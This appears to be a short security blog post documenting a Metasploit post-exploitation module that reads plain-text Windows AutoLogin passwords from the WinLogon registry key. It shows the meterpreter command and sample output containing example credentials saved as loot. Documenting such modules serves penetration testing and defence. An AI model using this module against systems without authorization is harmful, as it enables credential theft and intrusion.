[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor


This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt

Popular posts from this blog

CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities

Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability